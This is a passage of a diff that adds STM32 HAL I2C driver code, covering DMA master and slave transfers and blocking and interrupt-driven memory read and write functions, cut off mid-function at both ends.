hi2c->XferSize); + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + + if (dmaxferstatus == HAL_OK) + { + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + + /* Enable EVT and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_ERR); + + /* Enable DMA Request */ + SET_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN); + + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Generate Start */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + else + { + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Generate Start */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + + /* Enable EVT, BUF and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + } + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive in master mode an amount of data in non-blocking mode with DMA + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Master_Receive_DMA(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint8_t *pData, uint16_t Size) +{ + __IO uint32_t count = 0U; + HAL_StatusTypeDef dmaxferstatus; + + if (hi2c->State == HAL_I2C_STATE_READY) + { + /* Wait until BUSY flag is reset */ + count = I2C_TIMEOUT_BUSY_FLAG * (SystemCoreClock / 25U / 1000U); + do + { + count--; + if (count == 0U) + { + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + while (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BUSY) != RESET); + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_RX; + hi2c->Mode = HAL_I2C_MODE_MASTER; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + hi2c->Devaddress = DevAddress; + + if (hi2c->XferSize > 0U) + { + if (hi2c->hdmarx != NULL) + { + /* Set the I2C DMA transfer complete callback */ + hi2c->hdmarx->XferCpltCallback = I2C_DMAXferCplt; + + /* Set the DMA error callback */ + hi2c->hdmarx->XferErrorCallback = I2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hi2c->hdmarx->XferHalfCpltCallback = NULL; + hi2c->hdmarx->XferM1CpltCallback = NULL; + hi2c->hdmarx->XferM1HalfCpltCallback = NULL; + hi2c->hdmarx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hi2c->hdmarx, (uint32_t)&hi2c->Instance->DR, (uint32_t)hi2c->pBuffPtr, hi2c->XferSize); + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + + if (dmaxferstatus == HAL_OK) + { + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Generate Start */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + + /* Enable EVT and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_ERR); + + /* Enable DMA Request */ + SET_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN); + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + else + { + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + + /* Enable EVT, BUF and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Generate Start */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + } + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Transmit in slave mode an amount of data in non-blocking mode with DMA + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Slave_Transmit_DMA(I2C_HandleTypeDef *hi2c, uint8_t *pData, uint16_t Size) +{ + HAL_StatusTypeDef dmaxferstatus; + + if (hi2c->State == HAL_I2C_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_TX; + hi2c->Mode = HAL_I2C_MODE_SLAVE; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + + if (hi2c->hdmatx != NULL) + { + /* Set the I2C DMA transfer complete callback */ + hi2c->hdmatx->XferCpltCallback = I2C_DMAXferCplt; + + /* Set the DMA error callback */ + hi2c->hdmatx->XferErrorCallback = I2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hi2c->hdmatx->XferHalfCpltCallback = NULL; + hi2c->hdmatx->XferM1CpltCallback = NULL; + hi2c->hdmatx->XferM1HalfCpltCallback = NULL; + hi2c->hdmatx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hi2c->hdmatx, (uint32_t)hi2c->pBuffPtr, (uint32_t)&hi2c->Instance->DR, hi2c->XferSize); + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_LISTEN; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + + if (dmaxferstatus == HAL_OK) + { + /* Enable Address Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + /* Enable EVT and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_ERR); + + /* Enable DMA Request */ + hi2c->Instance->CR2 |= I2C_CR2_DMAEN; + + return HAL_OK; + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Receive in slave mode an amount of data in non-blocking mode with DMA + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Slave_Receive_DMA(I2C_HandleTypeDef *hi2c, uint8_t *pData, uint16_t Size) +{ + HAL_StatusTypeDef dmaxferstatus; + + if (hi2c->State == HAL_I2C_STATE_READY) + { + if ((pData == NULL) || (Size == 0U)) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_RX; + hi2c->Mode = HAL_I2C_MODE_SLAVE; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + + if (hi2c->hdmarx != NULL) + { + /* Set the I2C DMA transfer complete callback */ + hi2c->hdmarx->XferCpltCallback = I2C_DMAXferCplt; + + /* Set the DMA error callback */ + hi2c->hdmarx->XferErrorCallback = I2C_DMAError; + + /* Set the unused DMA callbacks to NULL */ + hi2c->hdmarx->XferHalfCpltCallback = NULL; + hi2c->hdmarx->XferM1CpltCallback = NULL; + hi2c->hdmarx->XferM1HalfCpltCallback = NULL; + hi2c->hdmarx->XferAbortCallback = NULL; + + /* Enable the DMA stream */ + dmaxferstatus = HAL_DMA_Start_IT(hi2c->hdmarx, (uint32_t)&hi2c->Instance->DR, (uint32_t)hi2c->pBuffPtr, hi2c->XferSize); + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_LISTEN; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA_PARAM; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + + if (dmaxferstatus == HAL_OK) + { + /* Enable Address Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + /* Enable EVT and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_ERR); + + /* Enable DMA Request */ + SET_BIT(hi2c->Instance->CR2, I2C_CR2_DMAEN); + + return HAL_OK; + } + else + { + /* Update I2C state */ + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Update I2C error code */ + hi2c->ErrorCode |= HAL_I2C_ERROR_DMA; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Write an amount of data in blocking mode to a specific memory address + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param MemAddress Internal memory address + * @param MemAddSize Size of internal memory address + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Mem_Write(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint16_t MemAddress, uint16_t MemAddSize, uint8_t *pData, uint16_t Size, uint32_t Timeout) +{ + /* Init tickstart for timeout management*/ + uint32_t tickstart = HAL_GetTick(); + + /* Check the parameters */ + assert_param(IS_I2C_MEMADD_SIZE(MemAddSize)); + + if (hi2c->State == HAL_I2C_STATE_READY) + { + /* Wait until BUSY flag is reset */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_BUSY, SET, I2C_TIMEOUT_BUSY_FLAG, tickstart) != HAL_OK) + { + return HAL_BUSY; + } + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_TX; + hi2c->Mode = HAL_I2C_MODE_MEM; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + + /* Send Slave Address and Memory Address */ + if (I2C_RequestMemoryWrite(hi2c, DevAddress, MemAddress, MemAddSize, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + while (hi2c->XferSize > 0U) + { + /* Wait until TXE flag is set */ + if (I2C_WaitOnTXEFlagUntilTimeout(hi2c, Timeout, tickstart) != HAL_OK) + { + if (hi2c->ErrorCode == HAL_I2C_ERROR_AF) + { + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + } + return HAL_ERROR; + } + + /* Write data to DR */ + hi2c->Instance->DR = *hi2c->pBuffPtr; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + + if ((__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BTF) == SET) && (hi2c->XferSize != 0U)) + { + /* Write data to DR */ + hi2c->Instance->DR = *hi2c->pBuffPtr; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + } + } + + /* Wait until BTF flag is set */ + if (I2C_WaitOnBTFFlagUntilTimeout(hi2c, Timeout, tickstart) != HAL_OK) + { + if (hi2c->ErrorCode == HAL_I2C_ERROR_AF) + { + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + } + return HAL_ERROR; + } + + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Read an amount of data in blocking mode from a specific memory address + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param MemAddress Internal memory address + * @param MemAddSize Size of internal memory address + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @param Timeout Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Mem_Read(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint16_t MemAddress, uint16_t MemAddSize, uint8_t *pData, uint16_t Size, uint32_t Timeout) +{ + /* Init tickstart for timeout management*/ + uint32_t tickstart = HAL_GetTick(); + + /* Check the parameters */ + assert_param(IS_I2C_MEMADD_SIZE(MemAddSize)); + + if (hi2c->State == HAL_I2C_STATE_READY) + { + /* Wait until BUSY flag is reset */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_BUSY, SET, I2C_TIMEOUT_BUSY_FLAG, tickstart) != HAL_OK) + { + return HAL_BUSY; + } + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_RX; + hi2c->Mode = HAL_I2C_MODE_MEM; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + + /* Send Slave Address and Memory Address */ + if (I2C_RequestMemoryRead(hi2c, DevAddress, MemAddress, MemAddSize, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + if (hi2c->XferSize == 0U) + { + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + } + else if (hi2c->XferSize == 1U) + { + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + } + else if (hi2c->XferSize == 2U) + { + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Enable Pos */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + } + else + { + /* Clear ADDR flag */ + __HAL_I2C_CLEAR_ADDRFLAG(hi2c); + } + + while (hi2c->XferSize > 0U) + { + if (hi2c->XferSize <= 3U) + { + /* One byte */ + if (hi2c->XferSize == 1U) + { + /* Wait until RXNE flag is set */ + if (I2C_WaitOnRXNEFlagUntilTimeout(hi2c, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + } + /* Two bytes */ + else if (hi2c->XferSize == 2U) + { + /* Wait until BTF flag is set */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_BTF, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + } + /* 3 Last bytes */ + else + { + /* Wait until BTF flag is set */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_BTF, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Disable Acknowledge */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + + /* Wait until BTF flag is set */ + if (I2C_WaitOnFlagUntilTimeout(hi2c, I2C_FLAG_BTF, RESET, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Generate Stop */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_STOP); + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + } + } + else + { + /* Wait until RXNE flag is set */ + if (I2C_WaitOnRXNEFlagUntilTimeout(hi2c, Timeout, tickstart) != HAL_OK) + { + return HAL_ERROR; + } + + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + + if (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BTF) == SET) + { + /* Read data from DR */ + *hi2c->pBuffPtr = (uint8_t)hi2c->Instance->DR; + + /* Increment Buffer pointer */ + hi2c->pBuffPtr++; + + /* Update counter */ + hi2c->XferSize--; + hi2c->XferCount--; + } + } + } + + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Write an amount of data in non-blocking mode with Interrupt to a specific memory address + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param MemAddress Internal memory address + * @param MemAddSize Size of internal memory address + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Mem_Write_IT(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint16_t MemAddress, uint16_t MemAddSize, uint8_t *pData, uint16_t Size) +{ + __IO uint32_t count = 0U; + + /* Check the parameters */ + assert_param(IS_I2C_MEMADD_SIZE(MemAddSize)); + + if (hi2c->State == HAL_I2C_STATE_READY) + { + /* Wait until BUSY flag is reset */ + count = I2C_TIMEOUT_BUSY_FLAG * (SystemCoreClock / 25U / 1000U); + do + { + count--; + if (count == 0U) + { + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + while (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BUSY) != RESET); + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_TX; + hi2c->Mode = HAL_I2C_MODE_MEM; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + hi2c->Devaddress = DevAddress; + hi2c->Memaddress = MemAddress; + hi2c->MemaddSize = MemAddSize; + hi2c->EventCount = 0U; + + /* Generate Start */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + + /* Enable EVT, BUF and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Read an amount of data in non-blocking mode with Interrupt from a specific memory address + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param DevAddress Target device address + * @param MemAddress Internal memory address + * @param MemAddSize Size of internal memory address + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Mem_Read_IT(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint16_t MemAddress, uint16_t MemAddSize, uint8_t *pData, uint16_t Size) +{ + __IO uint32_t count = 0U; + + /* Check the parameters */ + assert_param(IS_I2C_MEMADD_SIZE(MemAddSize)); + + if (hi2c->State == HAL_I2C_STATE_READY) + { + /* Wait until BUSY flag is reset */ + count = I2C_TIMEOUT_BUSY_FLAG * (SystemCoreClock / 25U / 1000U); + do + { + count--; + if (count == 0U) + { + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + while (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BUSY) != RESET); + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + CLEAR_BIT(hi2c->Instance->CR1, I2C_CR1_POS); + + hi2c->State = HAL_I2C_STATE_BUSY_RX; + hi2c->Mode = HAL_I2C_MODE_MEM; + hi2c->ErrorCode = HAL_I2C_ERROR_NONE; + + /* Prepare transfer parameters */ + hi2c->pBuffPtr = pData; + hi2c->XferCount = Size; + hi2c->XferSize = hi2c->XferCount; + hi2c->XferOptions = I2C_NO_OPTION_FRAME; + hi2c->Devaddress = DevAddress; + hi2c->Memaddress = MemAddress; + hi2c->MemaddSize = MemAddSize; + hi2c->EventCount = 0U; + + /* Enable Acknowledge */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_ACK); + + /* Generate Start */ + SET_BIT(hi2c->Instance->CR1, I2C_CR1_START); + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + if (hi2c->XferSize > 0U) + { + /* Note : The I2C interrupts must be enabled after unlocking current process + to avoid the risk of I2C interrupt handle execution before current + process unlock */ + + /* Enable EVT, BUF and ERR interrupt */ + __HAL_I2C_ENABLE_IT(hi2c, I2C_IT_EVT | I2C_IT_BUF | I2C_IT_ERR); + } + return HAL_OK; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Write an amount of data in non-blocking mode with DMA to a specific memory address + * @param hi2c Pointer to a I2C_HandleTypeDef structure that contains + * the configuration information for the specified I2C. + * @param DevAddress Target device address: The device 7 bits address value + * in datasheet must be shifted to the left before calling the interface + * @param MemAddress Internal memory address + * @param MemAddSize Size of internal memory address + * @param pData Pointer to data buffer + * @param Size Amount of data to be sent + * @retval HAL status + */ +HAL_StatusTypeDef HAL_I2C_Mem_Write_DMA(I2C_HandleTypeDef *hi2c, uint16_t DevAddress, uint16_t MemAddress, uint16_t MemAddSize, uint8_t *pData, uint16_t Size) +{ + __IO uint32_t count = 0U; + HAL_StatusTypeDef dmaxferstatus; + + /* Init tickstart for timeout management*/ + uint32_t tickstart = HAL_GetTick(); + + /* Check the parameters */ + assert_param(IS_I2C_MEMADD_SIZE(MemAddSize)); + + if (hi2c->State == HAL_I2C_STATE_READY) + { + /* Wait until BUSY flag is reset */ + count = I2C_TIMEOUT_BUSY_FLAG * (SystemCoreClock / 25U / 1000U); + do + { + count--; + if (count == 0U) + { + hi2c->PreviousState = I2C_STATE_NONE; + hi2c->State = HAL_I2C_STATE_READY; + hi2c->Mode = HAL_I2C_MODE_NONE; + hi2c->ErrorCode |= HAL_I2C_ERROR_TIMEOUT; + + /* Process Unlocked */ + __HAL_UNLOCK(hi2c); + + return HAL_ERROR; + } + } + while (__HAL_I2C_GET_FLAG(hi2c, I2C_FLAG_BUSY) != RESET); + + /* Process Locked */ + __HAL_LOCK(hi2c); + + /* Check if the I2C is already enabled */ + if ((hi2c->Instance->CR1 & I2C_CR1_PE) != I2C_CR1_PE) + { + /* Enable I2C peripheral */ + __HAL_I2C_ENABLE(hi2c); + } + + /* Disable Pos */ + 